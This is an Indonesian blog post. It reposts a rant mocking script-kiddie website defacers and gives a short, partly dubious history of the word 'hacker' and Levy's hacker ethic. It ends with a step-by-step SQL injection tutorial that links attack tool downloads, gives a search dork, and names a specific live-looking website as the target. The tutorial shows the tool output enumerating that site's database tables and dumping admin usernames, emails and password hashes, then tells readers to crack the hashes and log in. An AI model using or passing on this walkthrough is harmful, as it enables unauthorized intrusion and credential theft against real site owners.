Langsung aja dah, dibaca disini. Dan mohon diingat, ini bukan tulisan gue. gue malah ga ngerti apa itu hacking, apa itu shell codes dan apa itu Vulrn. Gue hanya seorang Newbie yang sedang berjuang menjadi newbie. :-)
maaf sebelumnya kalo tulisan saya ini membuat anda tersinggung
Setiap hari exploit demi exploit terus di publikasi di situs² underground para hacker.,Setiap hari selalu aja gw liat satu persatu situs mulai berjatuhan dan halaman index mereka telah berubah secara frontal dengan background rata² berwarna hitam dengan tulisan “Hacked by”!!,Mereka yg mulai kenal dengan istilah Hacker mulai mencari berpuluh puluh tutorial di internet tentang cara mendeface situs., mencoba bertanya di milis., forum., hingga bertanya langsung pada sang defacer via chating., dan mereka hanya mendapatkan jawaban “saya bukan hacker kaka”, “Hacker apaan sey omz”, “saya cupu om, ga bisa apa², salah orang situ klo nanya sama saya”!!, yap.., sebuah statement merendahkan diri menaikan mutu dari seorang defacer kacangan yg mengaku hacker.,4 tahun lebih gw terjun di dunia perhackingan., dan melihat scene hacking khususnya di indonesia., apa yg gw liat tentang hacking situs selama ini di lakukan bukan oleh seorang hacker., bahkan seorang kracker., mereka hanya seorang script kiddies yg hanya menyombongkan diri dari hasil deface mereka., dan mereka berbangga dalam hati mereka dan menyebut diri mereka “I am Hacker”…._
Kenapa mereka gw sebut rata² script kiddies., bukan… bukan gw meng-claim semua defacer itu seorang script kiddies., ada beberapa dari mereka yg mempunyai skill yg ga main², tapi rata² para kracker baru yg gw liat selama ini hanyalah seorang yg mengaku hacker tapi buta akan programming., ga bisa membuat program., ga ngerti gimana cara mencari exploit itu sendiri., mereka hanya singgah di situs hacker., melihat news bug terbaru., mencari korban melalui search engine., menginjeksi exploit pada url korban., mendapatkan password sang admin web yg masih terenkripsi., lalu meng’kracking password itu pada sebuah situs password kracking tanpa tau cara kerja’a., setelah password asli telah di dekripsi., mereka masuk ke dalam situs korban yg di tuju serta melakukan pengrusakan besar²an dan menyebut diri mereka dengan bangga dalam hati “I am Hacker”!!,Perlu lo ketahui, 1000 website yg lo deface dalam satu hari ga akan menjadikan lo seorang hacker., sebuah statement bodoh klo ada seseorang mengklaim diri mereka seorang hacker tapi buta akan programming dan ga bisa membuat program sendiri., sebuah statement bodoh apabila ada seseorang mengklaim diri mereka hacker dan mendeface sebuah situs melalui shell inject tapi mereka ga bisa lepas dari windows dan ga pernah mau apabila di suruh menginstall linux pada hardisk mereka dengan alasan linux/unix itu susah!!, what d fuck!!, and you claiming yourself a hacker??_
Friend… open your eyes!!, you’re not a hacker!!, you just script dumb kiddies!!, take a look around., seorang hacker tingkat tinggi melakukan deface untuk memberi tau sang admin bahwa ada kelemahan pada situs’a dan mereka berani bertanggung jawab atas perbuatannya.,seorang kracker berbahaya mendeface sebuah situs karena mereka mencari keuntungan materi dari itu semua dan seorang script kiddies mendeface sebuah situs hanya untuk pamer dan menjadi terkenal tanpa berani bertanggung jawab pada perbuatan mereka.,Cukup buat lo tau aja., seorang hacker dan kracker mampu membuat dan memodifikasi sebuah program!!, lain hal dengan script kiddies., gada yg bisa di banggain dari mereka., mereka hanya merusak dan merusak tanpa tau gimana cara memperbaiki apa yg mereka rusak., jadi masuk ke dalam kategori yg manakah lo??,
Ga adakah rasa malu lo ketika lo bisa membuat sebuah situs hancur dalam sekejap tapi lo ga ngerti ketika seorang bertanya apa itu TCP/IP, bagaimana mengkonfigurasi Firewall, bagiamana cara melihat port yg terbuka, apa perbedaan methode post dan get.,
Ga adakah rasa malu lo ketika lo mampu membuat situs itu jadi bermasalah dalam waktu yg lama tapi lo ga ngerti cara memfilter syntax SQL yg memungkinkan seorang attacker masuk melalui sql injection., cara patching situs yg terkena masalah remote file inclusion.,
Ga adakah rasa malu lo ketika lo di sebut hacker oleh orang lain tapi ketika lo di test untuk kerja oleh sebuah perusahaan dan di suruh membuat program dari bahasa pemrograman yg lo kuasai ternyata gada satupun bahasa program yg lo kuasain., dan lo menyebut diri lo hacker??, lo salah besar kawan!!, lo cuma nol besar!!,
Untuk menjadi seorang defacer sangatlah mudah., ga perlu banyak pengetahuan lebih., tapi untuk menjadi the real hacker bukanlah sebuah hal yg gampang!!, ketekunan., rasa ingin tau yg sangat besar., membuat., menghadapi dan menyelesaikan masalah bakal membuat lo menjadi seorang hacker yg cukup handal untuk menghadapi hari esok.,
so.., jadikanlah hidup lo ini lebih berharga, mulai dari sekarang yakinin di hati lo bahwa jangan ada lagi kata main², jangan pernah lagi ngelakuin hal² yg ga jelas dan sia² tanpa ada suatu alasan yg jelas., jangan tunggu besok lagi untuk berubah., karena hari esok belom tentu berpihak buat kita dan walaupun gw sering melakukan deface terhadap situs² dan mampu membuat program sederhana., tapi gw masih blom pantes untuk menyandang gelar seorang Hacker!!, masih ada orang yg lebih pantes untuk menyandang gelar itu!!, dan hingga saat ini gw masih tetap berjuang untuk terus belajar., belajar untuk menemukan sebuah titik cerah dalam hidup., karena gw mengerti bahwa 1 detik dalam hidup sangat berharga dan ga akan pernah bisa terulang lagi.,
Yuhu dalam banget kan,, mmuaakakakakakk., yang merasa tersindir ayo tunjuk tangan!!!!,
tp terlepas dari smua itu., segala sesuatu itu butuh proses!!, ga mungkin baru lahir uda bisa baca., ga mungkin baru lahir uda langusng bisa lari., buat gw sama halnya dengan hacker., dari yang newbie sampe elite hacker (suhu) itu tergantung kemauan dan kemampuan yang elo miliki., yang penting adalah belajar, bertanya, dan ada kemauan yang besar untuk itu., karena buat gw hacking itu adalah art., seni untuk bisa menembus ruang dan waktu dan menyusp bersama jutaan elektron., dan disanalah gw dapat kepuasan yang tak ternilai harganya._
APA ITU HACKERS ?
Banyak orang yang sering mendengar tentang kata Hacker bahkan orang yang tidak pernah memegang komputer sekalipun...Di Indonesia sendiri umumnya kata Hacker kebanyakan di mengerti sebagai seorang Ahli Komputer yang mampu melakukan tindakan-tindakan pembobolan suatu situs, mencuri credit card,..dan sejenisnya..alias Hacker adalah identik dengan kriminal..apa benar demikian...?
Asal pertama kata "Hacker" sendiri berawal dari sekitar tahun 60-an di Las Vegas di adakan sebuah permainan (Game) yang menggunakan system jaringan komputer (networking) dimana cara permainan itu satu sama lain berusaha untuk masuk ke system komputer lawan (pemain lainya) dan melumpuhkannya. dari sinilah kemudian orang-orang menamakan sekelompok anak-anak muda yang mengikuti permainanan ini sebagai "Hackers" yaitu sekelompok anak-anak muda yang mampu menjebol dan melumpuhkan system komputer orang.
Pada pekembangan selanjutnya kelompok Mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT).Mereka merupakan salah satu perintis perkembangan teknologi komputer dan mereka beroperasi dengan sejumlah komputer mainframe. Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.
Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini ‘cracker’ dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.
Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.
Demikian simple definisi dan asal-usul “Hacker“, yang pernah saya telusuri.tapi di zaman sekarang hacker diidentikkan dengan seseorang Komputer Maniac dan melakukan upaya-upaya penerobosan suatu sistem komputer tanpa otorisasi yang sah dengan tujuan untuk mengambil atau mencuri sesuatu dan identik dengan kriminal.
Para Hacker sejati sebetulnya memiliki kode etik yang pada awalnya diformulasikan dalam buku karya Steven Levy berjudul Hackers: Heroes of The Computer Revolution, pada tahun 1984.
Kode etik hacker tersebut, yang kerap dianut pula oleh para cracker, adalah :
1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali
2. Segala informasi haruslah gratis
3. Jangan percaya pada otoritas, promosikanlah desentralisasi
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.
Buat yg mau belajar injek SQL neh gue kasih Tutornya :D
Tool yang anda butuhkan untuk mempelajari teknik SQL Injection dibawah ini adalah
[-]Reiluke SQL Injection/XXS/RFI/LFI scanner
[-]Reiluke SQL Injection/XXS/RFI/LFI scanner
- CODE: SELECT ALL
http://www.ziddu.com/download/10062481/exploitscanner.zip.html
[-]Reiluke SQLi helper Vers 2.7
- CODE: SELECT ALL
http://www.ziddu.com/download/10062751/sqliHelper2.7.zip.html
Sebagai percobaan, kita gunakan kelemahan sql injection pada website yang menggunakan produk
CMS The iceberg milik http://www.imagetraders.com.au dengan Dork = details.php?p_id= 'Design & SEO by Image Traders Pty Ltd' (baca thread : http://forum.xcode.or.id/viewtopic.php?f=99&t=39284 ).
jalankan Reiluke SQL Injection/XXS/RFI/LFI scanner dan masukkan dork tersebut.
Tunggu beberapa saat dan kemudian ditemukan 112 web yang akan di test bug sqli
Klik "Test Sites" dan tunggu proses scanning
Di kolom Vulnerable List akan menampilkan sejumlah website yang bisa diijeksi dengan script racun SQL
Mari kita coba ekploitasi salah satu website tersebut. Jalankan Reiluke SQLi helper Vers 2.7 dan sebagai percobaan adalah http://www.kincclothing.com/goods.php?p_id=41. Klik "Inject" dan tunggu beberapa saat.
Get Server Info
Check if URL is Vulnerable
URL is Vulnerable
Check No. of Columns
No. of columns : 4
Check No. of Columns - finished
Looking for larget text visible column
Col num 1 found
Check if supports union
Check if supports union - finished
Check Current user
Check Current user - finished
Check if database version
Check if database version - finished
Check Current Database
Check current database - finished
Checking LoadFile
Check Load File - finished
Mysql version 5 OK - Please Get Database
Tool ini mendeteksi bahwa website tersebut bisa di-injeksi. kita bisa mendapatkan informasi lebih mendalam dari website tsb. sekarang klik 'Get database' untuk mendapatkan informasi database website tsb.
[1] Setelah muncul information_schema dan database dengan nama : kincc2_zc1 ,
[2] Arahkan Mouse dan pilih kincc2_zc1 lalu klik 'Get Tables' dan kemudian struktur tabel dalam database tersebut akan didapatkan sbb:
zen_admin
users
zen_address_book
zen_address_format
zen_admin
zen_admin_activity_log
zen_authorizenet
zen_banners
zen_banners_history
zen_categories
zen_categories_description
zen_configuration
zen_configuration_group
zen_counter
zen_counter_history
zen_countries
zen_coupon_email_track
zen_coupon_gv_customer
zen_coupon_gv_queue
zen_coupon_redeem_track
zen_coupon_restrict
zen_coupons
zen_coupons_description
zen_currencies
zen_customers
zen_customers_basket
zen_customers_basket_attributes
zen_customers_info
zen_customers_wishlist
zen_db_cache
zen_email_archive
zen_ezpages
zen_featured
zen_files_uploaded
zen_geo_zones
zen_get_terms_to_filter
zen_group_pricing
zen_languages
zen_layout_boxes
zen_manufacturers
zen_manufacturers_info
zen_media_clips
zen_media_manager
zen_media_to_products
zen_media_types
zen_meta_tags_categories_description
zen_meta_tags_products_description
zen_music_genre
zen_newsletters
zen_orders
zen_orders_products
zen_orders_products_attributes
zen_orders_products_download
zen_orders_status
zen_orders_status_history
zen_orders_total
zen_paypal
zen_paypal_payment_status
zen_paypal_payment_status_history
zen_paypal_session
zen_product_music_extra
zen_product_type_layout
zen_product_types
zen_product_types_to_category
zen_products
zen_products_attributes
zen_products_attributes_download
zen_products_description
zen_products_discount_quantity
zen_products_notifications
zen_products_options
zen_products_options_types
zen_products_options_values
zen_products_options_values_to_products_options
zen_products_to_categories
zen_project_version
zen_project_version_history
zen_query_builder
zen_record_artists
zen_record_artists_info
zen_record_company
zen_record_company_info
zen_reviews
zen_reviews_description
zen_salemaker_sales
zen_sessions
zen_specials
zen_tax_class
zen_tax_rates
zen_template_select
zen_upgrade_exceptions
zen_whos_online
zen_zones
zen_zones_to_geo_zones
[3] Setelah Tabel diatas muncul. pilih tabel Zen_admin dan klik 'Get Columns' untuk mendapatkan informasi kolom pada tabel tsb. anda akan mendapatkan kolom :
admin_name
admin_email
admin_pass
admin_level
Kolom diatas berisi informasi admin login dan password.
[4]Blok keempat kolom tsb: admin_name, admin_email, admin_pass, admin_level dan klik 'Dump Now'
Admin beserta Password akan anda dapatkan dalam bentuk Hash yang telah dienkripsi.
yang perlu anda lanjutkan sendiri adalah mencrack enkripsi tersebut, kemudian menemukan halaman login dan masuk ke website.
Selamat berusaha
Belajar hack Facebook via Facebook :P
Tak ada kata terlambat dalam belajar...hacking adalah seni dan kreatifitas
Langganan:
Postingan (Atom)